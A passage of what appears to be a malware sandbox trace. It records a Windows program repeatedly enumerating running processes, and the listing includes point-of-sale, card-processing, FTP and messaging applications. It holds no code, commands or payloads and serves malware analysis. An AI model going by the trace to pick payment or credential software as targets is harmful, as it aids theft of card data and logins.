lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0181.115] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0181.118] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0181.121] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0181.124] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0181.126] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0181.128] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0181.131] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0181.139] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0181.142] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0181.145] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0181.147] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0181.150] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0181.152] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0181.155] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0181.157] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0181.160] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0181.162] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0181.165] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0181.167] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0181.169] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0181.172] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0181.174] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0181.181] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0181.183] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0181.186] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0181.188] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0181.190] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0181.193] CloseHandle (hObject=0x6c4) returned 1 [0181.193] Sleep (dwMilliseconds=0x64) [0181.294] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x6c4 [0181.310] Process32First (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0181.314] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0181.316] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0181.318] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0181.320] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0181.322] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0181.324] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0181.327] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0181.329] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0181.331] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.339] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.341] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0181.344] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.346] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.348] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.350] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.353] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.356] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.359] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.361] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0181.363] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0181.366] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0181.373] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0181.376] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.379] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0181.384] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0181.386] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0181.388] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0181.390] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0181.392] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0181.394] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.396] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0181.398] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0181.400] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0181.401] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0181.403] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.404] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0181.405] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0181.406] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0181.408] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0181.409] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0181.410] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0181.411] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0181.413] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0181.414] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0181.415] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0181.417] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0181.418] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0181.419] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0181.420] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0181.422] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0181.423] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0181.424] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0181.425] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0181.427] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0181.428] Process32Next (in: hSnapshot=0x6c4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0181.429] Process32Next (in: 